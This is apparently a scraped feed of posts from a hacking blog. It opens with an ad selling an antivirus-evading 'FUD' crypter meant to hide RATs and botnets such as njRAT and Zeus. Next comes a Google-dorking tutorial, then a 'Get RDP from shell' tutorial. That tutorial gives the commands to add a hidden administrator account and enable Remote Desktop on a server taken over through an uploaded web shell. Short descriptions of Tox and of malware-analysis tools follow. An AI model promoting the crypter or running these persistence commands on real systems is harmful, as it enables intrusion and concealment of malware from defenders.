ExPLOiTInc Crypter For Sell



Name :- ExPLOiTInc Crypter
Lang :- VB
Coder :- Sam404
Team :- My Team ExPLOiTInc
Update Stub :- Every Week

FUD RATE :- 0/40

FUD RATE LINK

Working Bots :- Rats (Bozok,NJRAT,CyberGate,XRat) Botnets (Zeus,Pony And Others)

Price :- 25$

Money Via :- PerfectMoney - BitCoin

Jabber :- j0er00t@exploit.im
ICQ :- 691768633
Skype :- joeroot.exploitinc
Facebook :- Hack2Wwworld Admin Link
Read More

[TUTORIAL] Advanced Google Searching

Advanced ways to search on google:
Note that Google is case insensitive!

you can use this to search for whatever you want!
Want to find login urls?

inurl:login
inurl:login.php?

perhaps search for pdf's with information from the FBI?
filetypedf inurl:fbi.gov


Web Search allinanchor:, allintext:, allintitle:, allinurl:, cache:, define:, filetype:, id:, inanchor:, info:, intext:, intitle:, inurl:, link:, related:, site:
Image Search allintitle:, allinurl:, filetype:, inurl:, intitle:, site:
Groups allintext:, allintitle:, author:, group:, insubject:, intext:, intitle:
Directory allintext:, allintitle:, allinurl:, ext:, filetype:, intext:, intitle:, inurl:
News allintext:, allintitle:, allinurl:, intext:, intitle:, inurl:, location:, source:
Product Search allintext:, allintitle:


allinanchor:
If you start your query with allinanchor:, Google restricts results to pages containing all query terms you specify in the anchor text on links to the page. For example, [ allinanchor: best museums sydney ] will return only pages in which the anchor text on links to the pages contain the words “best,” “museums,” and “sydney.”

Anchor text is the text on a page that is linked to another web page or a different place on the current page. When you click on anchor text, you will be taken to the page or place on the page to which it is linked. When using allinanchor: in your query, do not include any other search operators. The functionality of allinanchor: is also available through the Advanced Web Search page, under Occurrences.


allintext:
If you start your query with allintext:, Google restricts results to those containing all the query terms you specify in the text of the page. For example, [ allintext: travel packing list ] will return only pages in which the words “travel,” “packing,” and “list” appear in the text of the page. This functionality can also be obtained through the Advanced Web Search page, under Occurrences.


allintitle:
If you start your query with allintitle:, Google restricts results to those containing all the query terms you specify in the title. For example, [ allintitle: detect plagiarism ] will return only documents that contain the words “detect” and “plagiarism” in the title. This functionality can also be obtained through the Advanced Web Search page, under Occurrences.

The title of a webpage is usually displayed at the top of the browser window and in the first line of Google’s search results for a page. The author of a website specifies the title of a page with the HTML TITLE element. There’s only one title in a webpage. When using allintitle: in your query, do not include any other search operators. The functionality of allintitle: is also available through the Advanced Web Search page, under Occurrences.

In Image Search, the operator allintitle: will return images in files whose names contain the terms that you specify.

In Google News, the operator allintitle: will return articles whose titles include the terms you specify.


allinurl:
If you start your query with allinurl:, Google restricts results to those containing all the query terms you specify in the URL. For example, [ allinurl: google faq ] will return only documents that contain the words “google” and “faq” in the URL, such as “www.google.com/help/faq.html”. This functionality can also be obtained through the Advanced Web Search page, under Occurrences.

In URLs, words are often run together. They need not be run together when you’re using allinurl:.

In Google News, the operator allinurl: will return articles whose titles include the terms you specify.

The Uniform Resource Locator, more commonly known as URL, is the address that specifies the location of a file on the Internet. When using allinurl: in your query, do not include any other search operators. The functionality of allinurl: is also available through the Advanced Web Search page, under Occurrences.


author:
If you include author: in your query, Google will restrict your Google Groups results to include newsgroup articles by the author you specify. The author can be a full or partial name or email address. For example, [ children author:john author:doe ] or [ children author:doe@someaddress.com ] return articles that contain the word “children” written by John Doe or doe@someaddress.com.

Google will search for exactly what you specify. If your query contains [ author:”John Doe” ] (with quotes), Google won’t find articles where the author is specified as “Doe, John.”


cache:
The query cache:url will display Google’s cached version of a web page, instead of the current version of the page. For example, [ cache:www.eff.org ] will show Google’s cached version of the Electronic Frontier Foundation home page.

Note: Do not put a space between cache: and the URL (web address).

On the cached version of a page, Google will highlight terms in your query that appear after the cache: search operator. For example, [ cache:Learning To Fly: A Flight Diary (Hamish Reid) fly diary ] will show Google’s cached version of Flight Diary in which Hamish Reid’s documents what’s involved in learning how to fly with the terms “fly” and “diary” highlighted.


define:
If you start your query with define:, Google shows definitions from pages on the web for the term that follows. This advanced search operator is useful for finding definitions of words, phrases, and acronyms. For example, [ define: blog ] will show definitions for “Blog” (weB LOG).


ext:
This is an undocumented alias for filetype:.


filetype:
If you include filetype:suffix in your query, Google will restrict the results to pages whose names end in suffix. For example, [ web page evaluation checklist filetypedf ] will return Adobe Acrobat pdf files that match the terms “web,” “page,” “evaluation,” and “checklist.” You can restrict the results to pages whose names end with pdf and doc by using the OR operator, e.g. [ email security filetypedf OR filetype:doc ].

When you don’t specify a File Format in the Advanced Search Form or the filetype: operator, Google searches a variety of file formats; see the table in File Type Conversion.


group:
If you include group: in your query, Google will restrict your Google Groups results to newsgroup articles from certain groups or subareas. For example, [ sleep group:misc.kids.moderated ] will return articles in the group misc.kids.moderated that contain the word “sleep” and [ sleep group:misc.kids ] will return articles in the subarea misc.kids that contain the word “sleep.”


id:
This is an undocumented alias for info:.


inanchor:
If you include inanchor: in your query, Google will restrict the results to pages containing the query terms you specify in the anchor text or links to the page. For example, [ restaurants inanchor:gourmet ] will return pages in which the anchor text on links to the pages contain the word “gourmet” and the page contains the word “restaurants.”


info:
The query info:URL will present some information about the corresponding web page. For instance, [ info:gothotel.com ] will show information about the national hotel directory GotHotel.com home page.

Note: There must be no space between the info: and the web page URL.

This functionality can also be obtained by typing the web page URL directly into a Google search box.


insubject:
If you include insubject: in your query, Google will restrict articles in Google Groups to those that contain the terms you specify in the subject. For example, [ insubject:”falling asleep” ] will return Google Group articles that contain the phrase “falling asleep” in the subject.

Equivalent to intitle:.


intext:
The query intext:term restricts results to documents containing term in the text. For instance, [ Hamish Reid intextandemonia ] will return documents that mention the word “pandemonia” in the text, and mention the names “Hamish” and “Reid” anywhere in the document (text or not).

Note: There must be no space between the intext: and the following word.

Putting intext: in front of every word in your query is equivalent to putting allintext: at the front of your query, e.g., [ intext:handsome intextoets ] is the same as [ allintext: handsome poets ].


intitle:
The query intitle:term restricts results to documents containing term in the title. For instance, [ flu shot intitle:help ] will return documents that mention the word “help” in their titles, and mention the words “flu” and “shot” anywhere in the document (title or not).

Note: There must be no space between the intitle: and the following word.

Putting intitle: in front of every word in your query is equivalent to putting allintitle: at the front of your query, e.g., [ intitle:google intitle:search ] is the same as [ allintitle: google search ].


inurl:
If you include inurl: in your query, Google will restrict the results to documents containing that word in the URL. For instance, [ inurlrint site:Interactive online Google tutorial and references - Google Guide ] searches for pages on Google Guide in which the URL contains the word “print.” It finds pdf files that are in the directory or folder named “print” on the Google Guide website. The query [ inurl:healthy eating ] will return documents that mention the words “healthy” in their URL, and mention the word “eating” anywhere in the document.

Note: There must be no space between the inurl: and the following word.

Putting inurl: in front of every word in your query is equivalent to putting allinurl: at the front of your query, e.g., [ inurl:healthy inurl:eating ] is the same as [ allinurl: healthy eating ].

In URLs, words are often run together. They need not be run together when you’re using inurl:.


link:
The query link:URL shows pages that point to that URL. For example, to find pages that point to Google Guide’s home page, enter:

[ link:Interactive online Google tutorial and references - Google Guide ]

Note: According to Google’s documentation, “you cannot combine a link: search with a regular keyword search.”

Also note that when you combine link: with another advanced operator, Google may not return all the pages that match. The following queries should return lots of results, as you can see if you remove the -site: term in each of these queries.

Find links to the Google home page not on Google’s own site.

[ link:Google -site:google.com ]

Find links to the FBI home page not on its own site.

[ link:www.www.fbi.gov -site:fbi.gov ]


location:
If you include location: in your query on Google News, only articles from the location you specify will be returned. For example, [ queen location:canada ] will show articles that match the term “queen” from sites in Canada. Many other country names work; try them and see.

Two-letter US state abbreviations match individual US states, and two-letter Canadian province abbreviations (like NS for Nova Scotia) also work — although some provinces don’t have many newspapers online, so you may not get many results. Some other two-letter abbreviations — such as UK for the United Kingdom — are also available.


movie:
If you include movie: in your query, Google will find movie-related information. For examples, see Google’s Blog.


related:
The query related:URL will list web pages that are similar to the web page you specify. For instance, [ related:Consumer Reports Online ] will list web pages that are similar to the Consumer Reports home page.

Note: Don’t include a space between the related: and the web page url.

You can also find similar pages from the “Similar pages” link on Google’s main results page, and from the similar selector in the Page-Specific Search area of the Advanced Search page. If you expect to search frequently for similar pages, consider installing a GoogleScout browser button, which scouts for similar pages.


site:
If you include site: in your query, Google will restrict your search results to the site or domain you specify. For example, [ admissions site:LSE - London School of Economics and Political Science - Home ] will show admissions information from London School of Economics’ site and [ peace site:gov ] will find pages about peace within the .gov domain. You can specify a domain with or without a period, e.g., either as .gov or gov.

Note: Do not include a space between the “site:” and the domain.

You can use many of the search operators in conjunction with the basic search operators +, –, OR, and " ". For example, to find information on Windows security from all sites except microsoft.com, enter:

[ windows security –site:microsoft.com ]

You can also restrict your results to a site or domain through the domains selector on the Advanced Search page.


source:
If you include source: in your query, Google News will restrict your search to articles from the news source with the ID you specify. For example, [ election source:new_york_times ] will return articles with the word “election” that appear in the New York Times.

To find a news source ID, enter a query that includes a term and the name of the publication you’re seeking. You can also specify the publication name in the “news source” field in the Advanced News Search form. You’ll find the news source ID in the query box, following the source: search operator. For example, let’s say you enter the publication name Ha’aretz in the News Source box, then you click the Google Search button. The results page appears, and its search box contains [ peace source:ha_aretz__subscription_ ]. This means that the news source ID is ha_aretz__subscription_. This query will only return articles that include the word “peace” from the Israeli newspaper Ha’aretz.


weather:
If you enter a query with the word weather and a city or location name, if Google recognizes the location, the forecast will appear at the top of the results page. Otherwise, your results will usually include links to sites with the weather conditions and forecast for that location.

Since weather is not an advanced operator, there is no need to include a colon after the word. For example, [ weather Sunnyvale CA ] will return the weather for Sunnyvale, California and [ weather 94041 ] will return the weather for the city containing the zip code (US postal code) 94041, which is Mountain View, California.

Read More

Get RDP from shell, [small private tut]

Today i am going to explain hot to get RDP from a shell
(Notice:- The shell is uploaded on windows server and commands are executable on the shell)

So here we start the tutorial
(i)Execute this command on the shell
" net user username password /add"

Now you can use any username and password

Step 2:-

After executing this Command you added a user to the RDP. Now we need to add user as Administrator.
Now to add user as administrators group Use this command and execute this in shell.

"net localgroup administrators username /add"


Step 3:-
After execution try to connect with RDP by typing "mstsc" in "run"
add username and pass then click connect and enjoy your RDP.

Note:- If your RDP has static ip but doesnt connect on MSTSC then use these commands to allow remote users


reg add "hklm\system\currentControlSet\Control\Termina l Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f


reg add "hklm\system\currentControlSet\Control\Termina l Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f

Read More

Tox Chat - A New Kind Of Instant Messaging



Tox Chat - Secure And Best Chat Server 
 
A New Kind of Instant Messaging
With the rise of government monitoring programs, Tox provides an easy to use application that allows you to connect with friends and family without anyone else listening in. While other big-name services require you to pay for features, Tox is totally free, and comes without advertising.
 
About Tox
Nowadays, every government seems to be interested in what we're saying online. Tox is built on a "privacy goes first" agenda, and we make no compromises. Your safety is our top priority, and there isn't anything in the world that will change that.
 
Instant messaging, video conferencing, and more
 
Messages
At your fingertips. You're always in the loop with instant encrypted messaging.
 
Calls
Stay in touch. Make free and secure Tox to Tox calls.
 
Video
Seeing is believing. Catch up face to face with a secure video call.
 
SITE :- https://tox.im/
 
DOWNLOAD LINK :- https://tox.im/downloads 

Hack2wwworld Admin Tox ID :- EB44EE258FB38EF7435DD65D338B3940492FED0BE8D06805FD70EFC6FBA086332763BD204A79

Read More
Viper - A binary management and analysis framework dedicated to malware and exploit researchers



Viper is a binary analysis and management framework. Its fundamental objective is to provide a solution to easily organize your collection of malware and exploit samples as well as your collection of scripts you created or found over the time to facilitate your daily research. Think of it as a Metasploit for malware researchers: it provides a terminal interface that you can use to store, search and analyze arbitraty files with and a framework to easily create plugins of any sort.


Read More

Damm - Differential Analysis Of Malware In Memory

An open source memory analysis tool built on top of Volatility. It is meant as a proving ground for interesting new techniques to be made available to the community. These techniques are an attempt to speed up the investigation process through data reduction and codifying some expert knowledge.
 
Features
  • ~30 Volatility plugins combined into ~20 DAMM plugins (e.g., pslist, psxview and other elements are combined into a 'processes' plugin)
  • Can run multiple plugins in one invocation
  • The option to store plugin results in SQLite databases for preservation or for "cached" analysis
  • A filtering/type system that allows easily filtering on attributes like pids to see all information related to some process and exact or partial matching for strings, etc.
  • The ability to show the differences between two databases of results for the same or similar machines and manipulate from the cmdline how the differencing operates
  • The ability to warn on certain types of suspicious behavior
  • Output for terminal, tsv or grepable
Usage:
NOTE: Most DAMM output looks better piped through 'less -S' (upper 'S') as in: 
#python damm.py <some DAMM functionality> | less -S (for default output format)
python damm.py -h
usage: damm.py [-h] [-d DIR] [-p PLUGIN [PLUGIN ...]] [-f FILE] [-k KDBG]
               [--db DB] [--profile PROFILE] [--debug] [--info] [--tsv]
               [--grepable] [--filter FILTER] [--filtertype FILTERTYPE]
               [--diff BASELINE] [-u FIELD [FIELD ...]] [--warnings] [-q]

DAMM v1.0 Beta

optional arguments:
  -h, --help            show this help message and exit
  -d DIR                Path to additional plugin directory
  -p PLUGIN [PLUGIN ...]
                        Plugin(s) to run. For a list of options use --info
  -f FILE               Memory image file to run plugin on
  -k KDBG               KDBG address for the images (in hex)
  --db DB               SQLite db file, for efficient input/output
  --profile PROFILE     Volatility profile for the images (e.g. WinXPSP2x86)
  --debug               Print debugging statements
  --info                Print available volatility profiles, plugins
  --tsv                 Print screen formatted output.
  --grepable            Print in grepable text format
  --filter FILTER       Filter results on name:value pair, e.g., pid:42
  --filtertype FILTERTYPE
                        Filter match type; either "exact" or "partial",
                        defaults to partial
  --diff BASELINE       Diff the imageFile|db with this db file as a baseline
  -u FIELD [FIELD ...]  Use the specified fields to determine uniqueness of
                        memobjs when diffing
  --warnings            Look for suspicious objects.
  -q                    Query the supplied db (via --db).
Supported plugins
See #python damm.py --info
 
apihooks callbacks connections devicetree dlls evtlogs handles idt injections messagehooks mftentries modules mutants privileges processes services sids timers
 
Read More

Killtrojan Syslog is a free application to create a report about characteristics of the system to further analyze and look for signs of malware, also is intended to put the report in a specialized forum for users to help.
 
The tool has a very intuitive and easy to use for non-technical users to create their reports. Also useful for more advanced users who want to analyze a computer.
 
With the support logs with BBCode mode, you can paste the log generated in any forum (SMF, PHPBB, Invision ...) which will be detailed with clear colors for your reading.
 

Read More

Pyew - A Python Tool For Static Malware Analysis



Pyew is a (command line) python tool to analyse malware. It does have support for hexadecimal viewing, disassembly (Intel 16, 32 and 64 bits), PE and ELF file formats (it performs code analysis and let you write scripts using an API to perform many types of analysis), follows direct call/jmp instructions in the interactive command line, displays function names and string data references; supports OLE2 format, PDF format and more. It also supports plugins to add more features to the tool.
 
Pyew have been successfully used in big malware analysis systems since almost 2 years, processing thousand of files daily. 
 

Read More